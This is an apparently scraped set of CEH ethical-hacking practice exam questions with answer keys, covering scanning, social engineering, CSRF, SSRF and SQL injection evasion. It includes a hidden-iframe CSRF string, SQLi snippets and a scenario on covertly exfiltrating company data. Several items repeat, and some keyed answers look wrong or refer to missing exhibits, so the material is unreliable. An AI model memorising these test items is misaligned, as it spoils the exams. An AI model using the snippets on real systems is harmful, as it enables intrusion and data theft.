0% found this document useful (0 votes)
125 views51 pages

ceh 2

Uploaded by

alusegaudit
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
125 views51 pages

ceh 2

Uploaded by

alusegaudit
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 51

What is the most common method to exploit the “Bash Bug”

or “Shellshock” vulnerability?

A. SYN Flood

B. SSH

C. Through Web servers utilizing CGI (Common Gateway Interface) to


send a malformed environment variable to a vulnerable Web server

D. Manipulate format strings in text fields

what firewall evasion scanning technique make use of a


zombie system that has low network activity as well as its
fragment identification numbers?

A. Decoy scanning

B. Packet fragmentation scanning

C. Spoof source address scanning

D. Idle scanning

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Bob, a network administrator at BigUniversity, realized that


some students are connecting their notebooks in the wired
network to have Internet access. In the university campus,
there are many Ethernet ports available for professors and
authorized visitors but not for students.
He identified this when the IDS alerted for malware activities
in the network. What should Bob do to avoid this problem?

A. Disable unused ports in the switches

B. Separate students in a different VLAN

C. Use the 802.1x protocol

D. Ask students to use the wireless network

Answer Mark and next Verify

Suggestion:
The correct answer(s): C

A large company intends to use Blackberry for corporate


mobile phones and a security analyst is assigned to evaluate
the possible threats. The analyst will use the Blackjacking
attack method to demonstrate how an attacker could
circumvent perimeter defenses and gain access to the
Prometric Online Testing – Reports
https://ibt1.prometric.com/users/custom/report_queue/rq_str...
corporate network. What tool should the analyst use to
perform a Blackjacking attack?

A. Paros Proxy

B. BBProxy

C. Blooover

D. BBCrack

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Which of the following is not a Bluetooth attack?

A. Bluedriving

B. Bluesmacking

C. Bluejacking

D. Bluesnarfing

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

An attacker changes the profile information of a particular


user (victim) on the target website. The attacker uses this
string to update the victim’s profile to a text file and then
submit the data to the attacker’s database.
< iframe src=““http://www.vulnweb.com/updateif.php””
style=““display:none”” > < /iframe > What is this type of
attack (that can use either HTTP GET or HTTP POST) called?

A. Browser Hacking

B. Cross-Site Scripting

C. SQL Injection

D. Cross-Site Request Forgery

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

The network administrator at Spears Technology, Inc has


configured the default gateway Cisco router's access-list as
below:
You are hired to conduct security testing on their network.
You successfully brute-force the SNMP community string
using a SNMP crack tool. The access-list configured at the
router prevents you from establishing a successful
connection. You want to retrieve the Cisco configuration from
the router. How would you proceed?

A. Use the Cisco's TFTP default password to connect and download


the configuration file

B. Run a network sniffer and capture the returned traffic with the
configuration file from the router

C. Run Generic Routing Encapsulation (GRE) tunneling protocol from


your computer to the router masking your IP address

D. Send a customized SNMP set request with a spoofed source IP


address in the range -192.168.1.0

Answer Mark and next Verify

Suggestion:

The correct answer(s): B D

Session splicing is an IDS evasion technique in which an


attacker delivers data in multiple, small sized packets to the
target computer, making it very difficult for an IDS to detect
the attack signatures. Which tool can be used to perform
session splicing attacks?
A. tcpsplice

B. Burp

C. Hydra

D. Whisker

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

What is the BEST alternative if you discover that a rootkit has


been installed on one of your computers?

A. Copy the system files from a known good system

B. Perform a trap and trace

C. Delete the files and try to determine the source

D. Reload from a previous backup

E. Reload from known good media

Answer Mark and next Verify

Suggestion:

The correct answer(s): E

Tony wants to integrate a 128-bit symmetric block cipher with


key sizes of 128,192, or 256 bits into a software program,
which involves 32 rounds of computational operations that
include substitution and permutation operations on four 32-
bit word blocks using 8-variable S-boxes with 4-bit entry and
4-bit exit. Which of the following algorithms includes all the
above features and can be integrated by Tony into the
software program?

A. TEA

B. CAST-128

C. RC5

D. serpent

Answer Mark and next Verify


Suggestion:

The correct answer(s): D

Johnson, an attacker, performed online research for the


contact details of reputed cybersecurity firms. He found the
contact number of sibertech.org and dialed the number,
claiming himself to represent a technical support team from a
vendor. He warned that a specific server is about to be
compromised and requested sibertech.org to follow the
provided instructions. Consequently, he prompted the victim
to execute unusual commands and install malicious files,
which were then used to collect and pass critical Information
to Johnson's machine. What is the social engineering
technique Steve employed in the above scenario?

A. Quid pro quo

B. Diversion theft

C. Elicitation

D. Phishing

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

A zone file consists of which of the following Resource


Records (RRs)?

A. DNS, NS, AXFR, and MX records

B. DNS, NS, PTR, and MX records

C. SOA, NS, AXFR, and MX records

D. SOA, NS, A, and MX records

Answer Mark and next Verify

Suggestion:

The correct answer(s): D


Tremp is an IT Security Manager, and he is planning to deploy
an IDS in his small company. He is looking for an IDS with the
following characteristics: - Verifies success or failure of an
attack - Monitors system activities Detects attacks that a
network-based IDS fails to detect - Near real-time detection
and response - Does not require additional hardware - Lower
entry cost Which type of IDS is best suited for Tremp's
requirements?

A. Gateway-based IDS

B. Network-based IDS

C. Host-based IDS

D. Open source-based

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

You work for Acme Corporation as Sales Manager. The


company has tight network security restrictions. You are
trying to steal data from the company's Sales database
(Sales.xls) and transfer them to your home computer. Your
company filters and monitors traffic that leaves from the
internal network to the Internet. How will you achieve this
without raising suspicion?

A. Encrypt the Sales.xls using PGP and e-mail it to your personal gmail
account

B. Package the Sales.xls using Trojan wrappers and telnet them back
your home computer

C. You can conceal the Sales.xls database in another file like photo.jpg
or other files and send it out in an innocent looking email or file
transfer using Steganography techniques

D. Change the extension of Sales.xls to sales.txt and upload them as


attachment to your hotmail account

Answer Mark and next Verify

Suggestion:

The correct answer(s): C


What does a firewall check to prevent particular ports and
applications from getting packets into an organization?

A. Transport layer port numbers and application layer headers

B. Presentation layer headers and the session layer port numbers

C. Network layer headers and the session layer port numbers

D. Application layer port numbers and the transport layer headers

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

Which tier in the N-tier application architecture is responsible


for moving and processing data between the tiers?

A. Presentation tier

B. Application Layer

C. Logic tier

D. Data tier

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

When considering how an attacker may exploit a web server,


what is web server footprinting?

A. When an attacker implements a vulnerability scanner to identify


weaknesses

B. When an attacker creates a complete profile of the site's external


links and file structures

C. When an attacker gathers system-level data, including account


details and server names

D. When an attacker uses a brute-force attack to crack a web-server


password
Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Why should the security analyst disable/remove unnecessary


ISAPI filters?

A. To defend against social engineering attacks

B. To defend against webserver attacks

C. To defend against jailbreaking

D. To defend against wireless attacks

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Which regulation defines security and privacy controls for


Federal information systems and organizations?

A. HIPAA

B. EU Safe Harbor

C. PCI-DSS

D. NIST-800-53

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

What port number is used by LDAP protocol?

A. 110

B. 389

C. 464

D. 445

Answer Mark and next Verify


Suggestion:

The correct answer(s): B

Geena, a cloud architect, uses a master component in the


Kubernetes cluster architecture that scans newly generated
pods and allocates a node to them. This component can also
assign nodes based on factors such as the overall resource
requirement, data locality, software/hardware/policy
restrictions, and internal workload interventions.
Which of the following master components is explained in the
above scenario?

A. Kube-controller-manager

B. Kube-scheduler

C. Kube-apiserver

D. Etcd cluster

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Which of the following tactics uses malicious code to redirect


users' web traffic?

A. Spimming

B. Pharming

C. Phishing

D. Spear-phishing

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Which of the following are well known password-cracking


programs?

A. L0phtcrack
B. NetCat

C. Jack the Ripper

D. Netbus

E. John the Ripper

Answer Mark and next Verify

Suggestion:

The correct answer(s): A E

What useful information is gathered during a successful


Simple Mail Transfer Protocol (SMTP) enumeration?

A. The two internal commands VRFY and EXPN provide a confirmation


of valid users, email addresses, aliases, and mailing lists.

B. Reveals the daily outgoing message limits before mailboxes are


locked

C. The internal command RCPT provides a list of ports open to


message traffic.

D. A list of all mail proxy server addresses used by the targeted host

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

Although FTP traffic is not encrypted by default, which layer 3


protocol would allow for end-to-end encryption of the
connection?

A. SFTP

B. Ipsec

C. SSL

D. FTPS

Answer Mark and next Verify

Suggestion:

The correct answer(s): B


An attacker can employ many methods to perform social
engineering against unsuspecting employees, including
scareware.
What is the best example of a scareware attack?

A. A pop-up appears to a user stating, "You have won a free cruise!


Click here to claim your prize!"

B. A banner appears to a user stating, "Your account has been locked.


Click here to reset your password and unlock your account."

C. A banner appears to a user stating, "Your Amazon order has been


delayed. Click here to find out your new delivery date."

D. A pop-up appears to a user stating, "Your computer may have been


infected with spyware. Click here to install an anti-spyware tool to
resolve this issue."

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Matthew, a black hat, has managed to open a meterpreter


session to one of the kiosk machines in Evil Corp’s lobby. He
checks his current SID, which is S-1-5-21-1223352397-
1872883824-861252104-501. What needs to happen before
Matthew has full administrator access?

A. He must perform privilege escalation.

B. He needs to disable antivirus protection.

C. He needs to gain physical access.

D. He already has admin privileges, as shown by the “501” at the end


of the SID.

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

In an attempt to damage the reputation of a competitor


organization, Hailey, a professional hacker, gathers a list of
employee and client email addresses and other related
information by using various search engines, social
networking sites, and web spidering tools. In this process,
she also uses an automated tool to gather a list of words from
the target website to further perform a brute-force attack on
the previously gathered email addresses.
What is the tool used by Hailey for gathering a list of words
from the target website?

A. Shadowsocks

B. CeWL

C. Psiphon

D. Orbot

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Shiela is an information security analyst working at HiTech


Security Solutions. She is performing service version
discovery using Nmap to obtain information about the
running services and their versions on a target system.
Which of the following Nmap options must she use to perform
service version discovery on the target host?

A. -SN

B. -SX

C. -sV

D. -SF

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

Jude, a pen tester, examined a network from a hacker's


perspective to identify exploits and vulnerabilities accessible
to the outside world by using devices such as firewalls,
routers, and servers. In this process, he also estimated the
threat of network security attacks and determined the level of
security of the corporate network.
What is the type of vulnerability assessment that Jude
performed on the organization?

A. External assessment

B. Passive assessment

C. Host-based assessment

D. Application assessment

The correct answer(s): A

An organization has automated the operation of critical


infrastructure from a remote location. For this purpose, all
the industrial control systems are connected to the Internet.
To empower the manufacturing process, ensure the reliability
of industrial networks, and reduce downtime and service
disruption, the organization deckled to install an OT security
tool that further protects against security incidents such as
cyber espionage, zero-day attacks, and malware. Which of the
following tools must the organization employ to protect its
critical infrastructure?

A. Robotium

B. BalenaCloud

C. Flowmon

D. IntentFuzzer

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

Source: https://www.flowmon.com Flowmon empowers manufacturers


and utility companies to ensure the reliability of their industrial
networks confidently to avoid downtime and disruption of service
continuity. This can be achieved by continuous monitoring and
anomaly detection so that malfunctioning devices or security
incidents, such as cyber espionage, zero-days, or malware, can be
reported and remedied as quickly as possible.
Ben purchased a new smartphone and received some updates
on it through the OTA method. He received two messages:
one with a PIN from the network operator and another asking
him to enter the PIN received from the operator. As soon as
he entered the PIN, the smartphone started functioning in an
abnormal manner. What is the type of attack performed on
Ben in the above scenario?

A. Advanced SMS phishing

B. Bypass SSL pinning

C. Phishing

D. Tap 'n ghost attack

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

When configuring wireless on his home router, Javik disables


SSID broadcast. He leaves authentication “open” but sets the
SSID to a 32-character string of random letters and numbers.
What is an accurate assessment of this scenario from a
security perspective?

A. Since the SSID is required in order to connect, the 32-character


string is sufficient to prevent brute-force attacks.

B. Disabling SSID broadcast prevents 802.11 beacons from being


transmitted from the access point, resulting in a valid setup
leveraging “security through obscurity”.

C. It is still possible for a hacker to connect to the network after


sniffing the SSID from a successful wireless association.

D. Javik’s router is still vulnerable to wireless hacking attempts


because the SSID broadcast setting can be enabled using a specially
crafted packet sent to the hardware address of the access point.

Answer Mark and next Verify

Suggestion:

The correct answer(s): C


Andrew is an Ethical Hacker who was assigned the task of
discovering all the active devices hidden by a restrictive
firewall in the IPv4 range in a given target network.
Which of the following host discovery techniques must he use
to perform the given task?

A. UDP scan

B. TCP Maimon scan

C. arp ping scan

D. ACK flag probe scan

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

This TCP flag instructs the sending system to transmit all


buffered data immediately.

A. SYN

B. RST

C. PSH

D. URG

E. FIN

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

What two conditions must a digital signature meet?

A. Has to be the same number of characters as a physical signature


and must be unique.

B. Has to be unforgeable, and has to be authentic

C. Must be unique and have special characters

D. Has to be legible and neat

Answer Mark and next Verify


Suggestion:

The correct answer(s): B

If a token and 4-digit personal identification number (PIN) are


used to access a computer system and the token performs off-
line checking for the correct PIN, what type of attack is
possible?

A. Birthday

B. Brute force

C. Man-in-the-middle

D. Smurf

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Daniel Is a professional hacker who Is attempting to perform


an SQL injection attack on a target website.
www.movlescope.com. During this process, he encountered
an IDS that detects SQL Injection attempts based on
predefined signatures. To evade any comparison statement,
he attempted placing characters such as ‘'or '1'='1" In any
bask injection statement such as "or 1=1." Identify the
evasion technique used by Daniel in the above scenario.

A. Null byte

B. IP fragmentation

C. Char encoding

D. Variation

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Ron, a security professional, was pen testing web applications


and SaaS platforms used by his company. While testing, he
found a vulnerability that allows hackers to gain unauthorized
access to API objects and perform actions such as view,
update, and delete sensitive data of the company. What is the
API vulnerability revealed in the above scenario?

A. Code injections

B. Improper use of CORS

C. No ABAC validation

D. Business logic flaws

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

A security analyst is performing an audit on the network to


determine if there are any deviations from the security
policies in place. The analyst discovers that a user from the IT
department had a dial-out modem installed.
Which security policy must the security analyst check to see if
dial-out modems are allowed?

A. Firewall-management policy

B. Acceptable-use policy

C. Permissive policy

D. Remote-access policy

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Sophia is a shopping enthusiast who spends significant time


searching for trendy outfits online. Clark, an attacker, noticed
her activities several times and sent a fake email containing a
deceptive page link to her social media page displaying all-
new and trendy outfits. In excitement, Sophia clicked on the
malicious link and logged in to that page using her valid
credentials. Which of the following tools is employed by Clark
to create the spoofed email?

A. PyLoris
B. Slowloris

C. Evilginx

D. PLCinject

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

Calvin, a software developer, uses a feature that helps him


auto-generate the content of a web page without manual
involvement and is integrated with SSI directives. This leads
to a vulnerability in the developed web application as this
feature accepts remote user inputs and uses them on the
page. Hackers can exploit this feature and pass malicious SSI
directives as input values to perform malicious activities such
as modifying and erasing server files. What is the type of
injection attack Calvin's web application is susceptible to?

A. Server-side template injection

B. Server-side JS injection

C. CRLF injection

D. Server-side includes injection

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Which of the following statements about a zone transfer is


correct? (Choose three.)

A. A zone transfer is accomplished with the DNS

B. A zone transfer is accomplished with the nslookup service

C. A zone transfer passes all zone information that a DNS server


maintains

D. A zone transfer passes all zone information that a nslookup server


maintains
E. A zone transfer can be prevented by blocking all inbound TCP port
53 connections

F. Zone transfers cannot occur on the Internet

Answer Mark and next Verify

Suggestion:

The correct answer(s): A C E

An Internet Service Provider (ISP) has a need to authenticate


users connecting via analog modems, Digital Subscriber Lines
(DSL), wireless data services, and Virtual Private Networks
(VPN) over a Frame Relay network.
Which AAA protocol is the most likely able to handle this
requirement?

A. TACACS+

B. DIAMETER

C. Kerberos

D. RADIUS

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Which of the following viruses tries to hide from anti-virus


programs by actively altering and corrupting the chosen
service call interruptions when they are being run?

A. Macro virus

B. Stealth/Tunneling virus

C. Cavity virus

D. Polymorphic virus

Answer Mark and next Verify

Suggestion:

The correct answer(s): B


The following is an entry captured by a network IDS. You are
assigned the task of analyzing this entry. You
notice the value 0x90, which is the most common NOOP
instruction for the Intel processor. You figure that the attacker
is attempting a buffer overflow attack. You also notice
"/bin/sh" in the ASCII part of the output. As an analyst what
would you conclude about the attack?

A. The buffer overflow attack has been neutralized by the IDS

B. The attacker is creating a directory on the compromised machine

C. The attacker is attempting a buffer overflow attack and has


succeeded

D. The attacker is attempting an exploit that launches a command-


line shell

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Alice needs to send a confidential document to her coworker.


Bryan. Their company has public key infrastructure set up.
Therefore. Alice both encrypts the message and digitally
signs it. Alice uses_______to encrypt the message, and Bryan
uses__________to confirm the digital signature.
A. Bryan’s public key; Bryan’s public key

B. Alice’s public key; Alice’s public key

C. Bryan’s private key; Alice’s public key

D. Bryan’s public key; Alice’s public key

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

PKI uses public-key cryptography, which is widely used on the Internet


to encrypt messages or authenticate message senders. In public-key
cryptography, a CA generates public and private keys with the same
algorithm simultaneously. The private key is held only by the subject
(user, company, or system) mentioned in the certificate, while the
public key is made publicly available in a directory that all parties can
access. The subject keeps the private key secret and uses it to
decrypt the text encrypted by someone else using the corresponding
public key (available in a public directory). Thus, others encrypt
messages for the user with the user's public key, and the user
decrypts it with his/her private key.

Gavin owns a white-hat firm and is performing a website


security audit for one of his clients. He begins by running a
scan which looks for common misconfigurations and outdated
software versions. Which of the following tools is he most
likely using?

A. Nikto

B. Nmap

C. Metasploit

D. Armitage

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Bobby, an attacker, targeted a user and decided to hijack and


intercept all their wireless communications. He installed a
fake communication tower between two authentic endpoints
to mislead the victim. Bobby used this virtual tower to
interrupt the data transmission between the user and real
tower, attempting to hijack an active session, upon receiving
the users request. Bobby manipulated the traffic with the
virtual tower and redirected the victim to a malicious website.
What is the attack performed by Bobby in the above scenario?

A. Wardriving

B. KRACK attack

C. jamming signal attack

D. aLTEr attack

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

which of the following Bluetooth hacking techniques refers to


the theft of information from a wireless device through
Bluetooth?

A. Bluesmacking

B. Bluebugging

C. Bluejacking

D. Bluesnarfing

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Bluesnarfing is the unauthorized access of information from a wireless


device through a Bluetooth connection, often between phones,
desktops, laptops, and PDAs (personal digital assistant).

What is the way to decide how a packet will move from an


untrusted outside host to a protected inside that is behind a
firewall, which permits the hacker to determine which ports
are open and if the packets can pass through the packet-
filtering of the firewall?

A. Session hijacking
B. Firewalking

C. Man-in-the middle attack

D. Network sniffing

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Tremp is an IT Security Manager, and he is planning to deploy


an IDS in his small company. He is looking for an IDS with the
following characteristics: - Verifies success or failure of an
attack - Monitors system activities Detects attacks that a
network-based IDS fails to detect - Near real-time detection
and response - Does not require additional hardware - Lower
entry cost Which type of IDS is best suited for Tremp's
requirements?

A. Gateway-based IDS

B. Network-based IDS

C. Host-based IDS

D. Open source-based

Answer Mark and next Verify

Suggestion:

The correct answer(s): C

How is the public key distributed in an orderly, controlled


fashion so that the users can be sure of the sender’s identity?

A. Hash value

B. Private key

C. Digital signature

D. Digital certificate

Answer Mark and next Verify

Suggestion:

The correct answer(s): D


You are a Network Security Officer. You have two machines.
The first machine (192.168.0.99) has snort installed, and the
second machine (192.168.0.150) has kiwi syslog installed. You
perform a syn scan in your network, and you notice that kiwi
syslog is not receiving the alert message from snort. You
decide to run wireshark in the snort machine to check if the
messages are going to the kiwi syslog machine. What
Wireshark filter will show the connections from the snort
machine to kiwi syslog machine?

A. tcp.srcport= = 514 && ip.src= = 192.168.0.99

B. tcp.srcport= = 514 && ip.src= = 192.168.150

C. tcp.dstport= = 514 && ip.dst= = 192.168.0.99

D. tcp.dstport= = 514 && ip.dst= = 192.168.0.150

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Alice, a professional hacker, targeted an organization's cloud


services. She infiltrated the targets MSP provider by sending
spear-phishing emails and distributed custom-made malware
to compromise user accounts and gain remote access to the
cloud service. Further, she accessed the target customer
profiles with her MSP account, compressed the customer
data, and stored them in the MSP. Then, she used this
information to launch further attacks on the target
organization. Which of the following cloud attacks did Alice
perform in the above scenario?

A. Cloud hopper attack

B. Cloud cryptojacking

C. Cloudborne attack

D. Man-in-the-cloud (MITC) attack

Answer Mark and next Verify

Suggestion:

The correct answer(s): A


You are trying to break into a highly classified top-secret
mainframe computer with highest security system in place at
Merclyn Barley Bank located in Los Angeles.
You know that conventional hacking doesn't work in this case,
because organizations such as banks are generally tight and
secure when it comes to protecting their systems. In other
words, you are trying to penetrate an otherwise impenetrable
system. How would you proceed?

A. Look for "zero-day" exploits at various underground hacker


websites in Russia and China and buy the necessary exploits from
these hackers and target the bank's network

B. Try to hang around the local pubs or restaurants near the bank, get
talking to a poorly-paid or disgruntled employee, and offer them
money if they'll abuse their access privileges by providing you with
sensitive information

C. Launch DDOS attacks against Merclyn Barley Bank's routers and


firewall systems using 100, 000 or more "zombies" and "bots

D. Try to conduct Man-in-the-Middle (MiTM) attack and divert the


network traffic going to the Merclyn Barley Bank's Webserver to that
of your machine using DNS Cache Poisoning techniques

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Let's imagine three companies (A, B and C), all competing in a


challenging global environment. Company A and B are
working together in developing a product that will generate a
major competitive advantage for them. Company A has a
secure DNS server while company B has a DNS server
vulnerable to spoofing. With a spoofing attack on the DNS
server of company B, company C gains access to outgoing e-
mails from company
B. How do you prevent DNS spoofing?

A. Install DNS logger and track vulnerable packets

B. Disable DNS timeouts

C. Install DNS Anti-spoofing

D. Disable DNS Zone Transfer


Answer Mark and next Verify

Suggestion:

The correct answer(s): C

Jason, an attacker, targeted an organization to perform an


attack on its Internet-facing web server with the intention of
gaining access to backend servers, which are protected by a
firewall. In this process, he used a URL
https://xyz.com/feed.php?url:externaIsile.com/feed/to to
obtain a remote feed and altered the URL input to the local
host to view all the local resources on the target server. What
is the type of attack Jason performed in the above scenario?

A. website defacement

B. Server-side request forgery (SSRF) attack

C. Web server misconfiguration

D. web cache poisoning attack

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Bob, a system administrator at TPNQM SA, concluded one day


that a DMZ is not needed if he properly configures the firewall
to allow access just to servers/ports, which can have direct
internet access, and block the access to workstations.
Bob also concluded that DMZ makes sense just when a
stateful firewall is available, which is not the case of TPNQM
SA. In this context, what can you say?

A. Bob can be right since DMZ does not make sense when combined
with stateless firewall

B. Bob is partially right. He does not need to separate networks if he


can create rules by destination IPs, one by one

C. Bob is totally wrong. DMZ is always relevant when the company


has internet servers and workstations

D. Bob is partially right. DMZ does not make sense when a stateless
firewall is available
Answer Mark and next Verify

Suggestion:

The correct answer(s): C

*********************************

David is a security professional working in an organization,


and he is implementing a vulnerability management program
in the organization to evaluate and control the risks and
vulnerabilities in its IT infrastructure. He is currently
executing the process of applying fixes on vulnerable systems
to reduce the impact and severity of vulnerabilities. Which
phase of the vulnerability-management life cycle is David
currently in?

A. verification

B. Risk assessment

C. Vulnerability scan

D. Remedation

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Which definition among those given below best describes a


covert channel?

A. A server program using a port that is not well known.

B. Making use of a protocol in a way it is not intended to be used.

C. It is the multiplexing taking place on a communication link.

D. It is one of the weak channels used by WEP which makes it


insecure

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

You need a tool that can do network intrusion prevention and


intrusion detection, function as a network sniffer, and record
network activity, what tool would you most likely select?
A. Nmap

B. Cain & Abel

C. Nessus

D. Snort

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Session splicing is an IDS evasion technique in which an


attacker delivers data in multiple, small sized packets to the
target computer, making it very difficult for an IDS to detect
the attack signatures. Which tool can be used to perform
session splicing attacks?

A. tcpsplice

B. Burp

C. Hydra

D. Whisker

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Henry is a penetration tester who works for XYZ organization.


While performing enumeration on a client organization, he
queries the DNS server for a specific cached DNS record.
Further, by using this cached record, he determines the sites
recently visited by the organization's user. What is the
enumeration technique used by Henry on the organization?

A. DNS zone walking

B. DNS cache snooping

C. DNS SEC zone walking

D. DNS cache poisoning

Answer Mark and next Verify


Suggestion:

The correct answer(s): B

What is the way to decide how a packet will move from an


untrusted outside host to a protected inside that is behind a
firewall, which permits the hacker to determine which ports
are open and if the packets can pass through the packet-
filtering of the firewall?

A. Session hijacking

B. Firewalking

C. Man-in-the middle attack

D. Network sniffing

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Gerard, a disgruntled ex-employee of Sunglass IT Solutions,


targets this organization to perform sophisticated attacks and
bring down its reputation in the market. To launch the attacks
process, he performed DNS footprinting to gather information
about ONS servers and to identify the hosts connected in the
target network. He used an automated tool that can retrieve
information about DNS zone data including DNS domain
names, computer names. IP addresses. DNS records, and
network Who is records. He further exploited this information
to launch other sophisticated attacks. What is the tool
employed by Gerard in the above scenario?

A. Knative

B. zANTI

C. Towelroot

D. Bluto

Answer Mark and next Verify

Suggestion:

The correct answer(s): D


(https://www.darknet.org.uk/2017/07/bluto-dns-recon-zone-transfer-
brute-forcer/) "Attackers also use DNS lookup tools such as
DNSdumpster.com, Bluto, and Domain Dossier to retrieve DNS records
for a specified domain or hostname. These tools retrieve information
such as domains and IP addresses, domain Whois records, DNS
records, and network Whois records." CEH Module 02 Page 138

A large mobile telephony and data network operator has a


data center that houses network elements. These are
essentially large computers running on Linux. The perimeter
of the data center is secured with firewalls and IPS systems.
What is the best security policy concerning this setup?

A. Network elements must be hardened with user ids and strong


passwords. Regular security tests and audits should be performed.

B. As long as the physical access to the network elements is


restricted, there is no need for additional measures

C. There is no need for specific security measures on the network


elements as long as firewalls and IPS systems exist.

D. The operator knows that attacks and down time are inevitable and
should have a backup site.

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

Ethical hacker jane Smith is attempting to perform an SQL


injection attach. She wants to test the response time of a true
or false response and wants to use a second command to
determine whether the database will return true or false
results for user IDs. which two SQL Injection types would give
her the results she is looking for?

A. Out of band and boolean-based

B. Time-based and union-based

C. union-based and error-based

D. Time-based and boolean-based

Answer Mark and next Verify


Suggestion:

The correct answer(s): D

which type of virus can change its own code and then cipher
itself multiple times as it replicates?

A. Stealth virus

B. Tunneling virus

C. Cavity virus

D. Encryption virus

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

Why containers are less secure that virtual machines?

A. Host OS on containers has a larger surface attack.

B. Containers may full fill disk space of the host.

C. A compromise container may cause a CPU starvation of the host.

D. Containers are attached to the same virtual network.

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

What useful information is gathered during a successful


Simple Mail Transfer Protocol (SMTP) enumeration?

A. The two internal commands VRFY and EXPN provide a confirmation


of valid users, email addresses, aliases, and mailing lists.

B. Reveals the daily outgoing message limits before mailboxes are


locked

C. The internal command RCPT provides a list of ports open to


message traffic.

D. A list of all mail proxy server addresses used by the targeted host
Answer Mark and next Verify

Suggestion:

The correct answer(s): A

Which of the following web vulnerabilities would an attacker


be attempting to exploit if they delivered the following input?

A. XXE

B. SQLi

C. IDOR

D. XXS

Answer Mark and next Verify

Suggestion:

The correct answer(s): A

The establishment of a TCP connection involves a negotiation


called three-way handshake. What type of message does the
client send to the server in order to begin this negotiation?

A. ACK

B. SYN

C. RST

D. SYN-ACK

Answer Mark and next Verify

Suggestion:

The correct answer(s): B

Based on the below log, which of the following sentences are


true?
Mar 1, 2016, 7:33:28 AM 10.240.250.23 - 54373 10.249.253.15
- 22 tcp_ip

A. Application is FTP and 10.240.250.23 is the client and


10.249.253.15 is the server.
B. Application is SSH and 10.240.250.23 is the server and
10.249.253.15 is the client.

C. SSH communications are encrypted; it’s impossible to know who is


the client or the server.

D. Application is SSH and 10.240.250.23 is the client and


10.249.253.15 is the server.

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

What did the following commands determine?

A. That the Joe account has a SID of 500

B. These commands demonstrate that the guest account has NOT


been disabled

C. These commands demonstrate that the guest account has been


disabled

D. That the true administrator is Joe

E. Issued alone, these commands prove nothing

Answer Mark and next Verify

Suggestion:

The correct answer(s): D

Which of the following is the BEST way to defend against


network sniffing?

A. Using encryption protocols to secure network communications

B. Register all machines MAC Address in a Centralized Database

C. Use Static IP Address

D. Restrict Physical Access to Server Rooms hosting Critical Servers

Answer Mark and next Verify


Suggestion:

The correct answer(s): A

To prevent networks from sniffing attacks, organizations and


individual users should keep away from applications using insecure
protocols, like basic HTTP authentication, File Transfer Protocol (FTP),
and Telnet. Instead, secure protocols such as HTTPS, Secure File
Transfer Protocol (SFTP), and Secure Shell (SSH) should be preferred.
In case there is a necessity for using any insecure protocol in any
application, all the data transmission should be encrypted. If required,
VPN (Virtual Private Networks) can be used to provide secure access
to users. NOTE: I want to note that the wording "best option" is valid
only for the EC-Council's exam since the other options will not help
against sniffing or will only help from some specific attack vectors.
The sniffing attack surface is huge. To protect against it, you will need
to implement a complex of measures at all levels of abstraction and
apply controls at the physical, administrative, and technical levels.
However, encryption is indeed the best option of all, even if your data
is intercepted - an attacker cannot understand it
https://en.wikipedia.org/wiki/Sniffing_attack

Which of the following tools are used for enumeration?


(Choose three.)

A. SolarWinds

B. USER2SID

C. Cheops

D. SID2USER

E. DumpSec

Answer Mark and next Verify

Suggestion:

The correct answer(s): B D E

From the following table, identify the wrong answer in terms


of Range (ft).
Standard Range (ft) 802.11a 150-150 802.11b 150-150
802.11g 150-150 802.16 (WiMax) 30 miles

A. 802.16 (WiMax)

B. 802.11g
C. 802.11b

D. 802.11a

Answer Mark and next Verify

